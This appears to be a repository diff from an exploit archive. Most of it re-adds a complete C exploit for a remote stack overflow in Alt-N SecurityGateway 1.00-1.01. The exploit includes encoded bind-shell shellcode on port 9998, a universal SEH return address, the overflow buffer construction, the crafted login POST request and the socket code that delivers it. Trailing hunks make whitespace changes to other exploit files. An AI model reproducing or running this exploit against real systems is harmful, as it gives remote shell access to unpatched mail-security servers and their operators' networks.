-	printf(" #  System  : Windows ALL                                              # \n");
-	printf(" #  Date    : 11.06.2008 - 14.06.2008                                  # \n");
-	printf(" # ------------------------------------------------------------------- # \n");
-}
-
-void end_logo()
-{
-	printf(" # ------------------------------------------------------------------- # \n");
-	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
-	printf(" ####################################################################### \n\n");
-}
-
-// milw0rm.com [2008-06-15]
+/* Dreatica-FXP crew
+* 
+* ----------------------------------------
+* Target         : Alt-N SecurityGateway v1.00-1.01 
+* ----------------------------------------
+* Exploit        : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
+* Exploit date   : 11.06.2008-14.06.2008
+* Exploit writer : Heretic2 (heretic2x@gmail.com)
+* OS             : Windows ALL 
+* Crew           : Dreatica-FXP
+* ----------------------------------------
+* Details        : Obtain the overflow and crash the application is peace a cake job.
+*                  To make a wroking code execution here is a hell. First we can see that
+*                  the username before overflow the buffer pass through some functions, 
+*                  that changes and restrict some useful chars. Firstly the beffer gets 
+*                  lowered so the overflow should not contain upper chars  :( . So i decided 
+*                  to use some encoders for the payload like nonupper and non alpha from MSF.
+*                  The nonupper use the `@` (0x40) char which the app doesn't eat at all.
+*                  The nonalpha encoder in decoder code and the generated body contained 
+*                  always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1, 
+*                  0x90, 0x91. Don't know, may be this chars translation was due to my russian locale.
+*                  After few days of work i have comed with the required bindshell which bypass
+*                  all restricted chars and executes. Thx to skylined, for his alpha tool. 
+* Bad chars      : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E
+*                  0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0
+*                  0xC1 0xC2 0x80 0x81
+* ----------------------------------------
+* Thanks to:
+*       1. securfrog               (       )
+*       2. ALPHA 2: Zero-tolerance (  ) 
+*       3. The Metasploit project  ( http://metasploit.com           ) 
+*       4. Dreatica-FXP crew       ( http://www.dreatica-fxp.com     )
+************************************************************************************
+* This was written for educational purpose only. Use it at your own risk. Author will be not be 
+* responsible for any damage, caused by that code.
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+
+#pragma comment(lib,"ws2_32")
+
+
+void usage(char * s);
+void logo();
+void end_logo();
+void print_info_banner_line(const char * key, const char * val);
+
+void extract_ip_and_port( char * &remotehost, int * port, char * str);
+int  fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
+
+int hr2_connect(char * remotehost, int port, int timeout);
+int hr2_udpconnect(char * remotehost, int port,  struct sockaddr_in * addr, int timeout);
+int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
+int execute(struct _buf * abuf, char * remotehost, int port);
+
+struct _buf 
+{
+	unsigned char * ptr;
+	unsigned int size;
+};
+int construct_shellcode(int sh, struct _buf * shf, int target);
+int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
+
+
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring);
+char	*optarg;		// global argument pointer
+int		optind = 0, opterr; 	// global argv index
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+struct {
+	const char * name;
+	int length;
+	char *shellcode;	
+}shellcodes[]={ 	
+	 {"Bindshell, port 9998", 743, 
+		/* The non-encoded metasploit payload
+		* windows/shell_bind_tcp - 317 bytes
+		* http://www.metasploit.com
+		* Encoder: generic/none
+		*/
+		/*
+		* Encoder: heretic2's nonupper. with help of skylined tool.
+		*/
+		"\x6a\x20\x5b\x93\xf7\xe0\x91\xe8\xff\xff\xff\xff\x30\x5e\x5e\x66"
+		"\x8b\x7e\x22\x97\x3c\x60\x7c\x07\x2c\x20\x66\x93\x88\x5e\x22\x83"
+		"\xee\xff\xe2\xeb\xe8\xff\xff\xff\xff\x36\x5b\x5b\x93\x91\x83\xe9"
+		"\xf8\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x71\x7a\x76\x74"
+		"\x78\x33\x30\x76\x78\x34\x61\x70\x30\x61\x33\x68\x68\x30\x61\x30"
+		"\x30\x61\x62\x61\x61\x62\x74\x61\x61\x71\x32\x61\x62\x32\x62\x62"
+		"\x30\x62\x62\x78\x70\x38\x61\x63\x6a\x6a\x69\x6b\x6c\x32\x6a\x6a"
+		"\x6b\x70\x6d\x6a\x68\x7a\x79\x6b\x6f\x6b\x6f\x6b\x6f\x33\x70\x6c"
+		"\x6b\x72\x6c\x36\x64\x71\x34\x6c\x6b\x71\x75\x77\x6c\x6c\x6b\x73"
+		"\x6c\x73\x35\x33\x68\x35\x71\x7a\x6f\x6c\x6b\x70\x6f\x35\x68\x6c"
+		"\x6b\x71\x6f\x67\x70\x75\x71\x6a\x6b\x77\x39\x6c\x6b\x77\x64\x6c"
+		"\x6b\x75\x71\x7a\x6e\x76\x71\x69\x70\x6d\x69\x6e\x6c\x6b\x34\x69"
+		"\x70\x72\x74\x63\x37\x6f\x31\x38\x6a\x74\x6d\x35\x71\x79\x72\x6a"
+		"\x6b\x6b\x64\x77\x6b\x71\x64\x67\x74\x67\x78\x32\x75\x6d\x35\x6c"
+		"\x6b\x71\x6f\x77\x74\x35\x71\x6a\x6b\x32\x66\x6c\x6b\x74\x6c\x70"
+		"\x6b\x6c\x6b\x71\x6f\x35\x6c\x75\x71\x6a\x6b\x75\x73\x66\x6c\x6c"
+		"\x6b\x6b\x39\x62\x6c\x76\x64\x75\x6c\x33\x71\x6f\x33\x66\x71\x79"
+		"\x6b\x75\x34\x6c\x6b\x71\x73\x36\x70\x6c\x6b\x71\x70\x74\x6c\x6c"
+		"\x6b\x72\x70\x75\x6c\x6e\x6d\x6c\x6b\x71\x70\x35\x78\x71\x6e\x73"
+		"\x78\x6c\x6e\x70\x6e\x64\x6e\x7a\x6c\x30\x70\x6b\x6f\x78\x76\x35"
+		"\x36\x76\x33\x32\x66\x33\x78\x70\x33\x77\x62\x72\x68\x72\x77\x34"
+		"\x33\x76\x72\x71\x6f\x70\x74\x6b\x6f\x78\x70\x62\x68\x38\x6b\x6a"
+		"\x6d\x6b\x6c\x77\x6b\x66\x30\x6b\x6f\x78\x76\x71\x6f\x6b\x39\x6a"
+		"\x65\x73\x76\x6d\x71\x7a\x6d\x73\x38\x64\x62\x70\x75\x62\x6a\x35"
+		"\x72\x6b\x6f\x6e\x30\x72\x68\x78\x79\x75\x79\x6b\x65\x6e\x6d\x66"
+		"\x37\x6b\x6f\x79\x66\x36\x33\x70\x73\x71\x63\x71\x63\x70\x73\x71"
+		"\x73\x71\x63\x31\x73\x36\x33\x6b\x6f\x68\x70\x32\x66\x65\x38\x71"
+		"\x37\x74\x6e\x72\x66\x71\x63\x6b\x39\x6b\x71\x6c\x75\x73\x78\x6f"
+		"\x74\x75\x6a\x74\x30\x6f\x37\x30\x77\x6b\x6f\x79\x66\x32\x6a\x64"
+		"\x70\x36\x31\x31\x65\x6b\x6f\x6e\x30\x75\x38\x6e\x64\x6e\x6d\x76"
+		"\x6e\x6b\x79\x71\x67\x6b\x6f\x78\x76\x70\x73\x70\x75\x6b\x6f\x78"
+		"\x70\x65\x38\x6b\x75\x31\x79\x6c\x66\x70\x69\x30\x77\x6b\x6f\x6e"
+		"\x36\x70\x70\x31\x64\x71\x64\x76\x35\x6b\x6f\x78\x70\x6c\x73\x72"
+		"\x68\x6d\x37\x63\x69\x39\x76\x32\x79\x71\x67\x6b\x6f\x6e\x36\x71"
+		"\x65\x6b\x6f\x78\x70\x73\x76\x73\x7a\x35\x34\x32\x66\x72\x68\x75"
+		"\x33\x72\x6d\x6d\x79\x6b\x75\x72\x6a\x76\x30\x76\x39\x71\x39\x68"
+		"\x6c\x6b\x39\x6d\x37\x72\x6a\x30\x64\x6b\x39\x6b\x72\x76\x71\x6f"
+		"\x30\x7a\x73\x6e\x6a\x6b\x6e\x70\x62\x76\x6d\x6b\x6e\x67\x32\x36"
+		"\x6c\x6a\x33\x6c\x6d\x33\x6a\x76\x78\x6e\x6b\x6e\x6b\x6e\x6b\x63"
+		"\x78\x73\x62\x6b\x6e\x6e\x73\x74\x76\x6b\x6f\x62\x75\x70\x64\x6b"
+		"\x6f\x38\x76\x71\x6b\x76\x37\x76\x32\x30\x71\x30\x71\x70\x71\x72"
+		"\x6a\x65\x71\x30\x71\x30\x71\x30\x75\x70\x71\x6b\x6f\x78\x70\x75"
+		"\x38\x6e\x6d\x6e\x39\x74\x65\x78\x6e\x70\x73\x6b\x6f\x6e\x36\x73"
+		"\x7a\x6b\x6f\x6b\x6f\x36\x77\x6b\x6f\x6e\x30\x6c\x6b\x36\x37\x6b"
+		"\x6c\x6b\x33\x69\x74\x75\x34\x6b\x6f\x38\x76\x66\x32\x6b\x6f\x38"
+		"\x70\x33\x78\x7a\x70\x6c\x6a\x63\x34\x71\x6f\x66\x33\x6b\x6f\x6e"
+		"\x36\x6b\x6f\x68\x70\x61\x61"
+	 },	  
+	{NULL, 0, NULL}
+};
+ 
+
+
+ 
+struct _target{
+	const char *t ;
+	unsigned long ret ;
+} targets[]=
+{	
+	{"Alt-N SecurityGateway 1.00/1.01 universal", 0x67672190 }, // nonupper pop/pop/ret
+	{"DOS/Crash/Debug/Test/Fun",                  0x61616161 },
+	{NULL,                                        0x00000000 }
+};
+
+// memory for buffers
+unsigned char payloadbuffer[10000], a_buffer[10000];
+long dwTimeout=5000;
+int timeout=5000;
+
+
+int main(int argc, char **argv)
+{
+	char c,*remotehost=NULL,temp1[100];
+	int sh,port=4000,itarget=0;
+	struct _buf  fshellcode, sbuffer;
+
+	logo();
+	if(argc<2)
+	{
+		usage(argv[0]);		
+		return -1;
+	}
+
+	WSADATA wsa;
+	WSAStartup(MAKEWORD(2,0), &wsa);
+	// set defaults
+	sh=0;	
+	// ------------	
+	
+	while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
+	{
+		switch (c)
+		{
+			case 'h':
+				if (strchr(optarg,':')==NULL)
+				{
+					remotehost=optarg;
+				}else 
+				{
+					sscanf(strchr(optarg,':')+1, "%d", &port);
+					remotehost=optarg;
+					*(strchr(remotehost,':'))='\0';
+				}
+				break; 				
+			case 't':
+				sscanf(optarg, "%d", &itarget);
+				itarget--;
+				break;						
+			case 'T':				
+				sscanf(optarg, "%ld", &dwTimeout);
+				break; 			
+			default:
+				usage(argv[0]);
+				WSACleanup();
+			return -1;
+		}		
+	}	
+
+	if(remotehost == NULL)
+	{
+		printf("   [-] Please enter remotehost\n");
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+	print_info_banner_line("Host", remotehost);
+	sprintf(temp1, "%d", port);
+	print_info_banner_line("Port", temp1);
+	print_info_banner_line("Payload", shellcodes[sh].name);
+	sprintf(temp1, "%d", 9998);
+	print_info_banner_line("BINDPort", temp1);
+	
+	printf(" # ------------------------------------------------------------------- # \n");
+	fflush(stdout);
+
+
+	memset(payloadbuffer, 0, sizeof(payloadbuffer));
+	fshellcode.ptr=payloadbuffer;
+	fshellcode.size=0;	
+
+	memset(a_buffer, 0, sizeof(a_buffer));
+	sbuffer.ptr=a_buffer;
+	sbuffer.size=0;
+
+	if(!construct_shellcode(sh, &fshellcode, itarget))
+	{
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+
+	printf("   [+] Payload constructed\n");
+	
+	if(!construct_buffer(&fshellcode, itarget, &sbuffer))
+	{
+		printf("   [-] Buffer not constructed\n");
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+	printf("   [+] Final buffer constructed\n");
+	
+
+	if(!execute(&sbuffer, remotehost, port))
+	{
+		printf("   [-] Buffer not sent\n");
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+	printf("   [+] Buffer sent\n");
+	
+	end_logo();
+	WSACleanup();
+	return 0;
+}
+
+int construct_shellcode(int sh, struct _buf * shf, int target)
+{
+	memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
+	shf->size=shellcodes[sh].length;
+
+	return 1;
+}
+
+
+
+char templ1[] =  "POST /SecurityGateway.dll HTTP/1.0\r\n"
+"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n"
+"Accept-Language: ru\r\n"
+"Content-Type: application/x-www-form-urlencoded\r\n"
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"
+"Content-Length: %d\r\n\r\n";
+char templ2[]="RequestedPage=login&username=%s&passwd=world&lang=en&logon=Sign+In";
+
+int encode_uri(char * in, int len, char * out, int *outlen)
+{
+	char *out2=out;
+	int i;
+	memset(out,0,*outlen);
+	for(i=0;iptr;
+
+	memset(buf,0,sizeof(buf));
+	memset(buf2,0,sizeof(buf2));
+	memset(rstr1,0,sizeof(rstr1));
+	memset(rstr2,0,sizeof(rstr2));
+
+	lp=buf;	
+
+		// overflow
+	memset(lp,'\x61',476);
+	lp+=476;	
+
+		// jmp over seh
+	*lp++='\x90';
+	*lp++='\x90';
+	*lp++='\xeb';
+	*lp++='\x04';
+
+		// replace SEH
+	*lp++ = (char)((targets[target].ret      ) & 0xff);
+	*lp++ = (char)((targets[target].ret >>  8) & 0xff);
+	*lp++ = (char)((targets[target].ret >> 16) & 0xff);
+	*lp++ = (char)((targets[target].ret >> 24) & 0xff);
+
+	memset(lp,'\x90',1500);
+	lp+=5;
+
+	memcpy(lp, shf->ptr, shf->size);
+	lp+=shf->size;
+
+
+	olen = 1500;
+	encode_uri(buf, (int)strlen(buf), buf2, &olen);
+	sprintf(rstr2,templ2,buf2);
+	sprintf(rstr1,templ1,strlen(rstr2));
+
+	strcat((char*)cp,rstr1);
+	strcat((char*)cp,rstr2);
+
+	cp+=strlen((char*)cp);
+	abuf->size=(int)(cp-abuf->ptr);
+	return 1;
+}
+
+
+void extract_ip_and_port( char * &remotehost, int * port, char * str)
+{
+	if (strchr(str,':')==NULL)
+	{
+		remotehost=str;
+	}else 
+	{
+		sscanf(strchr(str,':')+1, "%d", port);
+		remotehost=str;
+		*(strchr(remotehost,':'))='\0';
+	}
+}
+
+
+
+int hr2_connect(char * remotehost, int port, int timeout)
+{
+	SOCKET s;
+	struct hostent *host;
+	struct sockaddr_in addr;
+	TIMEVAL stTime;
+	TIMEVAL *pstTime = NULL;
+	fd_set x;
+	int res;
+
+	if (INFINITE != timeout) 
+	{
+		stTime.tv_sec = timeout / 1000;
+		stTime.tv_usec = timeout % 1000;
+		pstTime = &stTime;
+	}
+
+	host = gethostbyname(remotehost);
+	if (!host) return SOCKET_ERROR;
+
+	addr.sin_addr = *(struct in_addr*)host->h_addr;
+	addr.sin_port = htons(port);
+	addr.sin_family = AF_INET;
+
+	s = socket(AF_INET, SOCK_STREAM, 0);
+	if (s == SOCKET_ERROR)
+	{
+		closesocket(s);
+		return SOCKET_ERROR;
+	}
+
+	unsigned long l = 1;
+	ioctlsocket( s, FIONBIO, &l ) ;
+
+	connect(s, (struct sockaddr*)&addr, sizeof(addr));
+
+	FD_ZERO(&x);
+	FD_SET(s, &x);
+
+	res = select(NULL,NULL,&x,NULL,pstTime);
+	if(res< 0) return SOCKET_ERROR;
+	if(res==0) return 0;
+	return (int)s;
+}
+
+
+int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
+{
+	return send(s, (char *)buf, len, 0);
+}
+
+int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
+{
+	TIMEVAL stTime;
+	TIMEVAL *pstTime = NULL;
+	fd_set xy;
+	int res;
+
+	if (INFINITE != timeout) 
+	{
+		stTime.tv_sec = timeout / 1000;
+		stTime.tv_usec = timeout % 1000;
+		pstTime = &stTime;
+	}
+	FD_ZERO(&xy);
+	FD_SET(s, &xy);
+	
+	res = select(NULL,&xy,NULL,NULL,pstTime);
+
+	if(res==0) return 0;
+	if(res<0) return -1;
+
+	return recv(s, (char *)buf, len, 0);
+}
+
+int execute(struct _buf * abuf, char * remotehost, int port)
+{
+	int x;
+	SOCKET s ;
+	char RECVB[10000];
+
+	s = hr2_connect(remotehost, port, 10000);
+	if(s==0)
+	{
+		printf("   [-] connect() timeout\n");
+		return 0;
+	}
+	if(s==SOCKET_ERROR)
+	{
+		printf("   [-] Connection failed\n");
+		return 0;
+	}		
+	x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0);
+	printf("   [+] Sent %d out of %d bytes\n", x, abuf->size);
+
+	x = hr2_tcprecv(s, (unsigned char *)RECVB, 1000, 0);
+	
+	closesocket(s);
+	return 1;
+}
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring)
+{
+	static char *next = NULL;
+	if (optind == 0)
+		next = NULL;
+
+	optarg = NULL;
+
+	if (next == NULL || *next == '\0')
+	{
+		if (optind == 0)
+			optind++;
+
+		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
+		{
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		if (strcmp(argv[optind], "--") == 0)
+		{
+			optind++;
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		next = argv[optind];
+		next++;		// skip past -
+		optind++;
+	}
+
+	char c = *next++;
+	char *cp = strchr(optstring, c);
+
+	if (cp == NULL || c == ':')
+		return '?';
+
+	cp++;
+	if (*cp == ':')
+	{
+		if (*next != '\0')
+		{
+			optarg = next;
+			next = NULL;
+		}
+		else if (optind < argc)
+		{
+			optarg = argv[optind];
+			optind++;
+		}
+		else
+		{
+			return '?';
+		}
+	}
+
+	return c;
+}
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+void print_info_banner_line(const char * key, const char * val)
+{
+	char temp1[100], temp2[100];
+
+	memset(temp1,0,sizeof(temp1));	
+	memset(temp1, '\x20' , 58 - strlen(val) -1);	
+
+	memset(temp2,0,sizeof(temp2));
+	memset(temp2, '\x20' , 8 - strlen(key));	
+	printf(" #  %s%s: %s%s# \n", key, temp2, val, temp1);	
+
+}
+
+
+
+void usage(char * s)
+{	
+	int j;
+	printf("\n");
+	printf("    Usage: %s -h  -t \n", s);
+	printf("   -------------------------------------------------------------------\n");
+	printf("    Arguments:\n");
+	printf("      -h ........ host to attack, default port: 4000\n");
+	printf("      -t ........ target to use\n");		
+	printf("      -T ........ socket timeout\n");
+	printf("\n");
+	printf("    Supported SecurityGateway versions:\n");
+	for(j=0; targets[j].t!=0;j++)
+	{
+		printf("      %d. %s\n",j+1, targets[j].t);
+	}					
+	printf("\n");
+	printf("    Code execution:\n");
+	for(j=0; shellcodes[j].name!=0;j++)
+	{
+		printf("      %d. %s\n",j+1, shellcodes[j].name);
+	}		
+	end_logo();	
+}
+
+void logo()
+{
+	printf("\n\n");
+	printf(" ####################################################################### \n");	
+	printf(" #     ____                 __  _                  ______  __    _____ #\n");
+	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
+	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
+	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
+	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
+	printf(" #                                 crew                                #\n");
+	printf(" ####################################################################### \n");	
+	printf(" #  Exploit : Alt-N SecurityGateway 1.00-1.01 Remote Overflow exploit  # \n");
+	printf(" #  Solution: Update to 1.02 version                                   # \n");
+	printf(" #  Author  : Heretic2 < heretic2x [at] gmail.com >                    # \n");
+	printf(" #  Version : 1.0                                                      # \n");
+	printf(" #  System  : Windows ALL                                              # \n");
+	printf(" #  Date    : 11.06.2008 - 14.06.2008                                  # \n");
+	printf(" # ------------------------------------------------------------------- # \n");
+}
+
+void end_logo()
+{
+	printf(" # ------------------------------------------------------------------- # \n");
+	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
+	printf(" ####################################################################### \n\n");
+}
+
+// milw0rm.com [2008-06-15]
diff --git a/platforms/windows/remote/583.pl b/platforms/windows/remote/583.pl
index 873b8bb49..015442211 100755
--- a/platforms/windows/remote/583.pl
+++ b/platforms/windows/remote/583.pl
@@ -74,6 +74,6 @@ if($data =~ /Received/) {
       print "[*] Exploit may not have worked.\n";
 }
 
-$sock->shutdown(2);
-
-# milw0rm.com [2004-10-18]
+$sock->shutdown(2);
+
+# milw0rm.com [2004-10-18]
diff --git a/platforms/windows/remote/584.c b/platforms/windows/remote/584.c
index db5d0edb6..72d60a2cd 100755
--- a/platforms/windows/remote/584.c
+++ b/platforms/windows/remote/584.c
@@ -229,6 +229,6 @@ fp);
 	fclose(fp); 
  
 return 0; 
-} 
-
-// milw0rm.com [2004-10-20]
+} 
+
+// milw0rm.com [2004-10-20]
diff --git a/platforms/windows/remote/589.html b/platforms/windows/remote/589.html
index ae247fccd..3c0f0415a 100755
--- a/platforms/windows/remote/589.html
+++ b/platforms/windows/remote/589.html
@@ -6,7 +6,7 @@
       
     
       
     
         Result: (Keystrokes you pressed on the CitiBank website.)
     
-         
-      
     
-
-// milw0rm.com [2004-10-22]
+